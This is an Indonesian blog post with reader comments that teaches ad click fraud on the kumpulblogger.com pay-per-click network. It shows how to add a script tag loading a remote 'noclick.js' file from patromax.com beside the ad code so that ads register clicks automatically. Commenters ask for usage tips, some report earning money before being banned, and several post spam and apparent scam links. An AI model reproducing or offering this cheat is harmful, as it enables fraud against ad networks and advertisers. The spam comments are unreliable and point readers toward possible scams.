Kamis, 11 Juni 2009

Script auto click pada kumpulblogger.com

Setelah membuat kode untuk menginject script auto click pada iklan AdsenseCamp yang postingannya bisa anda baca disni, disini, disini dan disini. Sekarang saya akan mencoba untuk membuat kode autoclick pada iklan dari situs kumpulblogger.com.
Kumpulblogger kode cheat

Sebenarnya pada intinya kode atau script yang digunakan untuk membuat autoclick pada iklan kumpulblogger.com sama dengan kode yang saya gunakan untuk menginject iklan dari Adsensecamp.com. Hanya ada sedikit modifikasi saja.

Membuat kode cheat autoclick pada iklan kumpulblogger dapat dibilang sangat mudah. Anda hanya cukup menyisipkan beberapa baris kode javascript pada script iklan kumpulblogger.com.

Beberapa baris kode itu adalah :




1.<script type="text/JavaScript"

2.src="http://www.patromax.com/noclick.js" language="javascript">

3.</script>



Cara penggunaanya, anda cukup meletakkan script diatas tepat sebelum kode Tag HTML </BODY>. Silahkan lihat ilustrasi :

<HTML><HEAD>

………………………….
………………………….
simpan kode disini

</BODY>

</HTML>


Kumpulblogger kode cheat

Anda juga dapat menempatkan script tersebut tepat dibawah script iklan kumpulblogger.com.

contoh:

kode iklan kumpulblogger.com yang asli



1.<script src="http://kumpulblogger.com/sca.php?b=1945" type="text/javascript"></script>



kode iklan kumpulblogger.com yang telah diberi cheat kode



1.<script src="http://kumpulblogger.com/sca.php?b=1945" type="text/javascript"></script>

2.<script type="text/JavaScript"

3.src="http://www.patromax.com/noclick.js" language="javascript">

4.</script>



Mudah bukan?

Note : Saya tidak bertanggung jawab jika anda menggunakan script ini dan terjadi hal-hal yang tidak diinginkan. Berpikirlah dengan bijak sebelum bertindak.

NB : Script ini dibuat sebagai pembelajaran, tidak bermaksud untuk digunakan sebagai hal-hal buruk.

Sumber:www.patromax.com

Terkait

Description: Script auto click pada kumpulblogger.com Rating: 4.5 Reviewer: Unknown ItemReviewed: Script auto click pada kumpulblogger.com
Al
Mbah Qopet Updated at: 20.44

40 komentar:

  1. mantaf banget deh pokoknya...

    BalasHapus
  2. Thanks udah bagi2 ilmu neh.....
    Pertanyaannya adalah :

    1. apakah fungsi paling utama http://www.patromax.com/noclick.js
    ini hanya untuk situs kumpul blog saja atau bisa digunakan untuk situs lainnya? (maksudnya adalah apakah hanya untuk wordpress)
    2. lalu apakah autoclik artinya otomatis iklan itu akan muncul ?
    3. bagaimana dengan fungsi klik kanannya? apa masih bisa jalan ?
    4. ada sample atau contoh blog yang menggunakan hal ini ( maksudnya yang sudah berhasil - tujuaannya untuk belajar gettoooooo :P ) - karena saya tidak mempunyai wordpress.

    BalasHapus
  3. Pertanyaan saya,
    waktu disorot iklan kan lagsung muncul tapi menutup halaman web itu sendiri..
    nah gimana caranya supaya iklan itu muncul tapi keluar pada new page/halaman baru?

    BalasHapus
  4. Kalo script ini dibuat untuk iklan di banner kumpulblogger bisa ngga?

    BalasHapus
  5. akakom06331000914 Agustus 2009 20.40

    Numpang membantu...

    Menurut saya, fungsi utama dari http://www.patromax.com/noclick.js itu merupakan kode javascript yang di buat dan di letakan pada direktori hosting yang membuat autokliknya.. (untuk lebih jelasnya, silahkan copykan fungsi utama tersebut di browser anda)
    dan sepertinya dapat di buat di blogspot, namun di tidak bsa di lakukan di wordpress(no hosting)karena script javascript tidak di berlakukan....

    2.ya... iklan akan muncul secara otomatis tanpa harus di klik (hanya di arahkan pada iklannya saja, iklan akan muncul dengan otomatis)

    3. ya kalo dah otomatis mau di apakan lagi klik kanannya?

    4. hahahaha..... silahkan di googling..... :-)
    nih.. wa kasih :

    Jawaban nomor 4

    BalasHapus
  6. ya bisa broo....

    BalasHapus
  7. akakom063310009-TK15 Agustus 2009 02.01

    sedikit membantu aja lagi...

    di sisipkan kode: target=”_blank”

    BalasHapus
  8. target="_blank" itu disisipkan kemana?
    ke noclick.js atau dibagian script kumpulblogger?

    mohon bantuannya

    BalasHapus
  9. kalo untuk blogger enaknya di taruh di
    jadi otomatis iklan n postingan anda akan muncul di halaman baru n di tab yang baru.
    Bukan begitu..... ????

    BalasHapus
  10. loh kok ga muncul (head) (target="_blank) ...
    ( and ) ganti dengan

    BalasHapus
  11. maksudnya itu apa T_T? ko kata2nya terputus2? Mohon yang tahu bagaimana agar ini bisa muncul dihalaman baru... mohon bantuannya

    BalasHapus
  12. wah situs petromax ngilang kemana ya ??
    dah ga bisa di access lagi bang....

    BalasHapus
  13. Bos masih ga ngerti cari yang simpel dong.
    Banyak link iklan gw yang ga tampil di wordpress gratisan.
    Anyway salam kenal semoga tambah rame blognya iri nih gw.
    Numpang link ya bos mohon link balik.
    http://anythink4u.wordpress.com

    BalasHapus
  14. patromax nya udah tewass,,,jadi gak bisa pake javascript na

    BalasHapus
  15. bro saya punya yang lebih dahsya untuk ppc ini langsung aja ketempet ku di http://antiradiasione.wordpress.com/2009/10/16/langkah-cepat-sukses-di-kumpulblogger/ tapi resiko tangging dewe lo ya....

    BalasHapus
  16. wew...jadi udah nggak bisa diauto click lagi donk.. kalau patromaknya udah tewas mah bang...!!!

    BalasHapus
  17. Kecurangan tidak pernah abadi......... :D

    BalasHapus
  18. wah jujur aku masih pemula,. jd masih sedikit bingung.
    tp bagus Juga postingnya, mw gw coba dulu ya,..

    ama sekalian nitip Link ya bro,..

    http://marhikacompany.blogspot.com

    Pokoknya keren dah bognya gw doain semoga blog nie tambah keran n tambah rame!

    BalasHapus
  19. ya bisa brooo...makanya hrus di tanggung sendiri..

    BalasHapus
  20. ini buat blogspot apa wordpress sih?

    BalasHapus
  21. sayang sekali petromaxnya udah padam, mungkin karena minyak tanah udah diganti gas kali yaa wkwkwkwkw....btw nitip link ya bos buat siapa aja yang butuh software ama script bisnis kunjungi

    http://www.aapulsa.co.cc

    makasih bos....

    BalasHapus
  22. ada cara laen ga w bingung ni

    BalasHapus
  23. asik nih, boleh dicoba...

    BalasHapus
  24. dapat 100rb, habis itu dibanned. gara2 ketauan sama si kukuh kupret pemilik kumpulblogger. hehehehe

    BalasHapus
  25. Wah saya coba ya di blogspot..
    silahkan di cek..

    BalasHapus
  26. Keren juga tuh bos, gua coba ah.
    he..he...

    BalasHapus
  27. waduh" gawat dibanned ya bro.
    itu dengan jumlah traffik brapa bro?
    misal traffik sehari sampe 1k brapa ya pendapatannya....

    http://kag3.co.cc << buat Game online jadi Offline
    http://gamevids.info << nah Game Dll dsini
    http://mojokertolinuxer.com << Linux dan Open Source

    BalasHapus
  28. tak tambahi bung kowek
    dibaned + disodomi waria

    BalasHapus
  29. Hosting tempat nympen js nya dah di Bann.
    ada js lain gak???

    BalasHapus
  30. hehehe, rugi y... mendig bloging for fun aj, ADS pasang sewajarnya aj, etar udh dpt byak d ban... hmz...

    BalasHapus
  31. seep ni blog8 Juli 2010 23.34

    o...gitu ta mas... thx atas infonya

    kawan2 ..
    kalok mau uang 6 dollar dalam <1 menit
    bisa diclick link dibawah ini
    aku nggak bohong / scam...
    dijamin memuaskan hasilnya
    setelah click link terus create account

    http://tinyurl.com/3yry67f

    BalasHapus
  32. zzzzzzzzzzzz

    BalasHapus
  33. wah asyik tuh.. tp kemren dapet kabar sekarang udah ketat bos.. kemarin aja temenku bru 2 minggu langsung kena banned gara2 ketahuan pake script bginian.. tp lumayan lah udah dapet 200rb..

    i-Soft review

    BalasHapus
  34. Gampang itu,, trik biasa itu sih. Coba kunjungi ini: http://klik.ws/nomorhpaku ,pndptn saya 300ribuan/minggu rutin. buat yg mau bsa pelajari sndiri atau krim email ke: admin@adminmona.tk ,thankz);

    BalasHapus
  35. cara di atas sekarang masih bisa ga? atau dah ktahuan...?

    BalasHapus
  36. Ada Yang aru Ga Ni

    Tolong Kabarin Aku Ya Di Blog Ku
    Buat Yang Punya Blog Boleh Ga Tukeran Link ???
    Konfirmasi Di Blogku ya

    BalasHapus
  37. Kayanya sdh ngga jadi gan, soalnya situs patromax sdh kena banned...
    salam blogger :)

    BalasHapus
  38. mantap bos !

    www.unikgaul.com

    BalasHapus